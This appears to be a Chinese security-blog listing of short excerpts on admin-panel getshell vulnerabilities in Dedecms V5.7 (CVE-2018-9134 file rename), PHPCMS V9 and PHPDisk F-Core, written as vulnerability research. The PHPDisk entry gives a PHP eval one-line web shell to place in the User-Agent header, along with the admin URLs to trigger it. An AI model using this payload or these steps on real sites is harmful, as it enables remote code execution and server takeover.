Dedecms V5.7 后台文件重命名[CVE-2018-9134]

Dedecms V5.7 后台文件重命名[CVE-2018-9134]Dedecms V5.7版本后台可实现对于文件的重命名,可将上传的任意文件重名为php文件,导致getshell。该漏洞的逻辑比较简单,就从漏洞的入口文件开始看,漏洞的入口文件是dede/file_manage_control.php,其部分源码如下:重点就在于这里的if,由于dede采取的是伪全局变量注册机制,导致在未经过滤的情况下我们可声明任意变量。在该文件中,前面只是简单的验证身份是否正确,并没有对于变量进行任何过滤。也

dedecms织梦找后台地址最新方法

1.png

PHPCMS V9最新版本后台设计缺陷导致getshell

0x01 背景

周末审计了下phpcms的最新版本,前台已经很难找到漏洞了,故看了看后台相关的代码,发现还是有一处可以拿shell的漏洞。由于默认安装后需要超级管理员权限,故该漏洞很鸡肋,但感觉应该会在其它cms中也存在,所以主要分享下挖掘思路~
PS:使用的测试环境是php5.6(已经移除gpc选项)

PHPDisk F-Core 后台getshell方法

首先把浏览器User-Agent设置为:<?php @eval($_POST['x']);?>

打开管理后台高级配置提交 更新


http://localhost/admincp.php?item=settings&menu=base&action=advanced
http://localhost/system/admin_log

利用织梦漏洞寻找后台

QQ截图20140918214426.png